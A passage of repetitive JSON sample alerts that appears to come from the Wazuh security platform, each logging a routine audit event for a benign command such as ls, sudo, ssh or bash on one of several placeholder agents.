/usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: 